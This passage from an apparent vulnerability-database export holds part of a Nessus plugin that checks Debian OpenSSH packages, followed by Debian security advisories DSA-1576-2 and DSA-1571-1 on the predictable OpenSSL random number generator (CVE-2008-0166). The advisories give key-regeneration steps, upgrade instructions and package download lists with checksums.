Debian's openssl package (\nDSA-1571-1, CVE-2008-0166 ) indirectly affects OpenSSH. As a result,\nall user and host keys generated using broken versions of the openssl\npackage must be considered untrustworthy, even after the openssl\nupdate has been applied.\n\n1. Install the security updates\n\nThis update contains a dependency on the openssl update and will\nautomatically install a corrected version of the libssl0.9.8 package,\nand a new package openssh-blacklist.\n\nOnce the update is applied, weak user keys will be automatically\nrejected where possible (though they cannot be detected in all cases).\nIf you are using such keys for user authentication, they will\nimmediately stop working and will need to be replaced (see step 3).\n\nOpenSSH host keys can be automatically regenerated when the OpenSSH\nsecurity update is applied. The update will prompt for confirmation\nbefore taking this step.\n\n2. Update OpenSSH known_hosts files\n\nThe regeneration of host keys will cause a warning to be displayed\nwhen connecting to the system using SSH until the host key is updated\nin the known_hosts file. The warning will look like this :\n\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING:\nREMOTE HOST IDENTIFICATION HAS CHANGED! @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS\nPOSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be\neavesdropping on you right now (man-in-the-middle attack)! It is also\npossible that the RSA host key has just been changed.\n\nIn this case, the host key has simply been changed, and you should\nupdate the relevant known_hosts file as indicated in the error\nmessage. It is recommended that you use a trustworthy channel to\nexchange the server key. It is found in the file\n/etc/ssh/ssh_host_rsa_key.pub on the server; it's fingerprint can be\nprinted using the command :\n\nssh-keygen -l -f /etc/ssh/ssh_host_rsa_key.pub\n\nIn addition to user-specific known_hosts files, there may be a\nsystem-wide known hosts file /etc/ssh/ssh_known_hosts. This is file is\nused both by the ssh client and by sshd for the hosts.equiv\nfunctionality. This file needs to be updated as well.\n\n3. Check all OpenSSH user keys\n\nThe safest course of action is to regenerate all OpenSSH user keys,\nexcept where it can be established to a high degree of certainty that\nthe key was generated on an unaffected system.\n\nCheck whether your key is affected by running the ssh-vulnkey tool,\nincluded in the security update. By default, ssh-vulnkey will check\nthe standard location for user keys (~/.ssh/id_rsa, ~/.ssh/id_dsa and\n~/.ssh/identity), your authorized_keys file (~/.ssh/authorized_keys\nand ~/.ssh/authorized_keys2), and the system's host keys\n(/etc/ssh/ssh_host_dsa_key and /etc/ssh/ssh_host_rsa_key).\n\nTo check all your own keys, assuming they are in the standard\nlocations (~/.ssh/id_rsa, ~/.ssh/id_dsa, or ~/.ssh/identity) :\n\nssh-vulnkey\n\nTo check all keys on your system :\n\nsudo ssh-vulnkey -a\n\nTo check a key in a non-standard location :\n\nssh-vulnkey /path/to/key\n\nIf ssh-vulnkey says 'Unknown (no blacklist information)', then it has\nno information about whether that key is affected. In this case, you\ncan examine the modification time (mtime) of the file using 'ls -l'.\nKeys generated before September 2006 are not affected. Keep in mind\nthat, although unlikely, backup procedures may have changed the file\ndate back in time (or the system clock may have been incorrectly set).\nIf in doubt, generate a new key and remove the old one from any\nservers.\n\n4. Regenerate any affected user keys\n\nOpenSSH keys used for user authentication must be manually\nregenerated, including those which may have since been transferred to\na different system after being generated.\n\nNew keys can be generated using ssh-keygen, e.g. :\n\n $ ssh-keygen Generating public/private rsa key pair. Enter file in\n which to save the key (/home/user/.ssh/id_rsa): Enter passphrase\n (empty for no passphrase): Enter same passphrase again: Your\n identification has been saved in /home/user/.ssh/id_rsa. Your\n public key has been saved in /home/user/.ssh/id_rsa.pub. The key\n fingerprint is: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n user@host\n\n5. Update authorized_keys files (if necessary)\n\nOnce the user keys have been regenerated, the relevant public keys\nmust be propagated to any authorized_keys files (and authorized_keys2\nfiles, if applicable) on remote systems. Be sure to delete the lines\ncontaining old keys from those files.\n\nIn addition to countermeasures to mitigate the randomness\nvulnerability, this OpenSSH update fixes several other vulnerabilities\n:\n\n CVE-2008-1483: Timo Juhani Lindfors discovered that, when using X11\n forwarding, the SSH client selects an X11 forwarding port without\n ensuring that it can be bound on all address families. If the system\n is configured with IPv6 (even if it does not have working IPv6\n connectivity), this could allow a local attacker on the remote server\n to hijack X11 forwarding.\n\n CVE-2007-4752: Jan Pechanec discovered that ssh falls back to\n creating a trusted X11 cookie if creating an untrusted cookie fails,\n potentially exposing the local display to a malicious remote server\n when using X11 forwarding.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-0166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-1483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2007-4752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1576\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssh packages and take the measures indicated above.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 4.3p2-9etch1. Currently, only a subset of all supported\narchitectures have been built; further updates will be provided when\nthey become available.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/05/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"openssh-blacklist\", reference:\"0.1.1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"openssh-client\", reference:\"4.3p2-9etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"openssh-server\", reference:\"4.3p2-9etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ssh\", reference:\"4.3p2-9etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ssh-askpass-gnome\", reference:\"4.3p2-9etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"ssh-krb5\", reference:\"4.3p2-9etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:21:25", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1576-2 security@debian.org\nhttp://www.debian.org/security/ Noah Meyerhans\nMay 16, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : openssh\nVulnerability : predictable random number generator\nProblem type : remote\nDebian-specific: yes\nCVE Id(s) : CVE-2008-0166\n\nMatt Zimmerman discovered that entries in ~/.ssh/authorized_keys with\noptions (such as "no-port-forwarding" or forced commands) were ignored by\nthe new ssh-vulnkey tool introduced in openssh 1:4.3p2-9etch1 (see DSA\n1576-1). This could cause some compromised keys not to be listed in\nssh-vulnkey's output.\n\nThis update also adds more information to ssh-vulnkey's manual page.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1:4.3p2-9etch2\n\nWe recommend that you upgrade your openssh (1:4.3p2-9etch2) package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch2.dsc\n Size/MD5 checksum: 1010 7bcad5f65ff1722db7c431d3a25e8578\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2.orig.tar.gz\n Size/MD5 checksum: 920186 239fc801443acaffd4c1f111948ee69c\n http://security.debian.org/pool/updates/main/o/openssh/openssh_4.3p2-9etch2.diff.gz\n Size/MD5 checksum: 276621 27984546be5ba87687ae6e7e5df36578\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-krb5_4.3p2-9etch2_all.deb\n Size/MD5 checksum: 92022 1cd59a62eb401f21421f13a6caf3d509\n http://security.debian.org/pool/updates/main/o/openssh/ssh_4.3p2-9etch2_all.deb\n Size/MD5 checksum: 1052 b096153814cc8949820d9958f8b81a00\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_alpha.deb\n Size/MD5 checksum: 100498 2fa04ed9e0ee9625f28964938cc19b64\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_alpha.deb\n Size/MD5 checksum: 782726 0c48b38fc56cdaedb3d4a1eab9ecd25d\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_alpha.udeb\n Size/MD5 checksum: 213728 ff4b07cb720fb26210c3a49213737168\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_alpha.deb\n Size/MD5 checksum: 266510 113583573c885f7baa40b9a78933c6aa\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_alpha.udeb\n Size/MD5 checksum: 198498 6dd01cb3b4fe5cf3726142f429281187\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_amd64.deb\n Size/MD5 checksum: 100106 b4dc14aee0a9c94d96e3b392a2dd61e8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_amd64.deb\n Size/MD5 checksum: 711910 dc68b26b2810e7f47e3fa419c262bc07\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_amd64.deb\n Size/MD5 checksum: 245522 b02dc226eb5aae330b08429a17f0eef6\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_amd64.udeb\n Size/MD5 checksum: 183854 fa96f8d05d380a6053672de0a6bd30c1\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_amd64.udeb\n Size/MD5 checksum: 171334 b2eafdc135649523828db8416f22617d\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_arm.deb\n Size/MD5 checksum: 218980 6065fa1195e74549c7dd66fbe2b41718\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_arm.deb\n Size/MD5 checksum: 99668 c6260735e7d50c21e19d01702b4e45bb\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_arm.deb\n Size/MD5 checksum: 650608 42d8f87667ffd3fdccb26ec5c8d775ac\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_arm.udeb\n Size/MD5 checksum: 171666 4bc55e6d06de4f0bda2771ad78770d27\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_arm.udeb\n Size/MD5 checksum: 164870 f82b52267f503acfdf3f7ad1b40b0555\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_hppa.udeb\n Size/MD5 checksum: 189624 351333a1ca9d92e389b0197ec2cca869\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_hppa.deb\n Size/MD5 checksum: 733002 47e84be664670a3ad083d2a3f90c3124\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_hppa.deb\n Size/MD5 checksum: 100460 335b7aed705d4b8a1b9f96a5f6f9ec37\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_hppa.udeb\n Size/MD5 checksum: 198168 ec7f163eb74e84d4a8605e54715acc6a\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_hppa.deb\n Size/MD5 checksum: 249924 7ead727d52913c1ff8630e383f6ea48c\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_i386.deb\n Size/MD5 checksum: 223706 68ed0ebd125d47d1406095a818fac0f8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_i386.udeb\n Size/MD5 checksum: 162630 a032adc78b967a09180c480143022e93\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_i386.deb\n Size/MD5 checksum: 99688 949ba4673d2a74126a485098f29a6a96\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_i386.deb\n Size/MD5 checksum: 659896 b15d0dd5cc67362833a2c7853bdff958\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_i386.udeb\n Size/MD5 checksum: 154018 4af4893e4eb970c8b005bfee3a1896d5\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_ia64.udeb\n Size/MD5 checksum: 251842 ea30a3806bf73fa5df7c01b291b25660\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_ia64.deb\n Size/MD5 checksum: 101364 33209d8caa1a18569e5fdc2c954b0ad9\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_ia64.deb\n Size/MD5 checksum: 338254 53fecec5c1b02b797e9caa24fa40590e\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_ia64.udeb\n Size/MD5 checksum: 269868 c1e98de9b285610d6a2e98ed3875cf0b\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_ia64.deb\n Size/MD5 checksum: 962006 ddc1e2a9de43a804c04b74839b2f3c1a\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_mipsel.udeb\n Size/MD5 checksum: 192330 c58ce9d9bd8b904ead41b41fd0190d04\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_mipsel.deb\n Size/MD5 checksum: 251464 dbc9acc8341bfaf9301e4429b20aa579\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_mipsel.udeb\n Size/MD5 checksum: 201534 11ae7501d65bed1bcd555a31633112a6\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_mipsel.deb\n Size/MD5 checksum: 99856 0ff3c4ff0b5c891a0772b1e4522252d5\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_mipsel.deb\n Size/MD5 checksum: 735142 8913d6adc4df4b33bf8c60f304bc50b1\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_powerpc.udeb\n Size/MD5 checksum: 168316 eda08e79a293c684c9371b16ebb6d872\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_powerpc.deb\n Size/MD5 checksum: 101170 2df82e0bee254e7f3157965c44a1116b\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_powerpc.deb\n Size/MD5 checksum: 700848 167dafdb5c2131fa879934d671bcd0a8\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_powerpc.udeb\n Size/MD5 checksum: 173326 341ece3621bf9a865db8a51d6edce165\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_powerpc.deb\n Size/MD5 checksum: 237034 c4d121d9e6f7305a96f1ff4bd0cc62cf\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_s390.udeb\n Size/MD5 checksum: 188518 994524412f881158e5d3c2f8a9d6398a\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_s390.udeb\n Size/MD5 checksum: 196906 ae0a4c8c4056aa4416ba9f74d3e78e5e\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_s390.deb\n Size/MD5 checksum: 725718 97047ff8dc9d0d42e59fcc04553861f6\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_s390.deb\n Size/MD5 checksum: 100148 b0fc6b7f3af34bbbb9cdae41ecb244a6\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_s390.deb\n Size/MD5 checksum: 246770 3dc23f0937021e333a4b0be608df07c3\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch2_sparc.udeb\n Size/MD5 checksum: 166704 b39759f84a47b5876fc6fa1d0cd15b83\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch2_sparc.deb\n Size/MD5 checksum: 640390 179203ca93933eaa8533b9d5b92bd018\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch2_sparc.deb\n Size/MD5 checksum: 99644 3c7bed91286b1d9480a1453e7672242a\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch2_sparc.udeb\n Size/MD5 checksum: 158358 5850cbde916ceb8eed29a0c52e2c799c\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch2_sparc.deb\n Size/MD5 checksum: 218146 15608f46ef44bcd8f3244dd7fe58de52\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-05-16T16:14:30", "published": "2008-05-16T16:14:30", "id": "DEBIAN:DSA-1576-2:E7258", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00155.html", "title": "[SECURITY] [DSA 1576-2] New openssh packages fix predictable randomness", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-22T02:22:44", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1571-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nMay 13, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : openssl\nVulnerability : predictable random number generator\nProblem type : remote\nDebian-specific: yes\nCVE Id(s) : CVE-2008-0166\n\nLuciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nA detector for known weak key material will be published at:\n\n <http://security.debian.org/project/extra/dowkd/dowkd.pl.gz>\n <http://security.debian.org/project/extra/dowkd/dowkd.pl.gz.asc>\n (OpenPGP signature)\n\nInstructions how to implement key rollover for various packages will be\npublished at:\n\n <http://www.debian.org/security/key-rollover/>\n\nThis web site will be continously updated to reflect new and updated\ninstructions on key rollovers for packages using SSL certificates.\nPopular packages not affected will also be listed.\n\nIn addition to this critical change, two other vulnerabilities have been\nfixed in the openssl package which were originally scheduled for release\nwith the next etch point release: OpenSSL's DTLS (Datagram TLS,\nbasically "SSL over UDP") implementation did not actually implement the\nDTLS specification, but a potentially much weaker protocol, and\ncontained a vulnerability permitting arbitrary code execution\n(CVE-2007-4995). A side channel attack in the integer multiplication\nroutines is also addressed (CVE-2007-3108).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 0.9.8c-4etch3.\n\nFor the unstable distribution (sid) and the testing distribution\n(lenny), these problems have been fixed in version 0.9.8g-9.\n\nWe recommend that you upgrade your openssl package and subsequently\nregenerate any cryptographic material, as outlined above.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3.dsc\n Size/MD5 checksum: 1099 5e60a893c9c3258669845b0a56d9d9d6\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz\n Size/MD5 checksum: 3313857 78454bec556bcb4c45129428a766c886\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3.diff.gz\n Size/MD5 checksum: 55320 f0e457d6459255da86f388dcf695ee20\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_alpha.deb\n Size/MD5 checksum: 1025954 d82f535b49f8c56aa2135f2fa52e7059\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_alpha.deb\n Size/MD5 checksum: 4558230 399adb0f2c7faa51065d4977a7f3b3c4\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_alpha.deb\n Size/MD5 checksum: 2620892 0e5efdec0a912c5ae56bb7c5d5d896c6\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_alpha.deb\n Size/MD5 checksum: 2561650 affe364ebcabc2aa33ae8b8c3f797b5e\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_alpha.udeb\n Size/MD5 checksum: 677172 5228d266c1fc742181239019dbad4c42\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_amd64.deb\n Size/MD5 checksum: 1654902 d8ad8dc51449cf6db938d2675789ab25\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_amd64.deb\n Size/MD5 checksum: 891102 2e97e35c44308a59857d2e640ddf141a\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_amd64.deb\n Size/MD5 checksum: 992248 82193ea11b0bc08c74a775039b855a05\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_amd64.deb\n Size/MD5 checksum: 2178610 fb7c53e5f157c43753db31885ff68420\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_amd64.udeb\n Size/MD5 checksum: 580250 7fb3d7fee129cc9a4fb21f5c471dfbab\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_arm.deb\n Size/MD5 checksum: 1537440 c5ab48e9bde49ba32648fb581b90ba18\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_arm.udeb\n Size/MD5 checksum: 516576 84385b137c731de3b86824c17affa9f3\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_arm.deb\n Size/MD5 checksum: 2049882 7ed60840eb3e6b26c6856dcaf5776b0c\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_arm.deb\n Size/MD5 checksum: 1011698 abfa887593089ac0f1cd4e31154897ee\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_arm.deb\n Size/MD5 checksum: 805912 a605625ea107252e9aebbc77902a63ed\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_hppa.deb\n Size/MD5 checksum: 1585900 2cbe55764db351dc6c3c2d622aa90caf\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_hppa.deb\n Size/MD5 checksum: 2248328 664fb0992b786ce067a7d878056fc191\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_hppa.deb\n Size/MD5 checksum: 1030782 21f445c541d5e5b7c16de1db9ee9d681\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_hppa.deb\n Size/MD5 checksum: 945144 c1092f3bb94d920d0beaa372c9cab04e\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_hppa.udeb\n Size/MD5 checksum: 631132 76339119275786b5e80a7a1b4cd26b71\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_i386.deb\n Size/MD5 checksum: 2086512 eeef437fb87ad6687cd953d5951aa472\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_i386.deb\n Size/MD5 checksum: 5584696 6d364557c9d392bb90706e049860be66\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_i386.deb\n Size/MD5 checksum: 1000832 ed5668305f1e4b4e4a22fbd24514c758\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_i386.udeb\n Size/MD5 checksum: 554676 dbad0172c990359282884bac1d141034\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_i386.deb\n Size/MD5 checksum: 2717086 361fde071d18ccf93338134357ab1a61\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_ia64.udeb\n Size/MD5 checksum: 801748 05b29fc674311bd31fe945036a08abd5\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_ia64.deb\n Size/MD5 checksum: 1192192 56be85aceb4e79e45f39c4546bfecf4f\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_ia64.deb\n Size/MD5 checksum: 2593418 f9edaea0a86c1a1cea391f890d7ee70f\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_ia64.deb\n Size/MD5 checksum: 1569418 4b2cb04d13efabdddddbd0f6d3cefd9b\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_ia64.deb\n Size/MD5 checksum: 1071156 e1f487c4310ad526c071f7483de4cd1a\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_mips.deb\n Size/MD5 checksum: 1003816 f895a8bc714e9c373ee80f736b5af00b\n http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_mips.deb\n Size/MD5 checksum: 2262266 004484e816d4fe5ff03fe6d7df38d7b7\n http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_mips.deb\n Size/MD5 checksum: 1692606 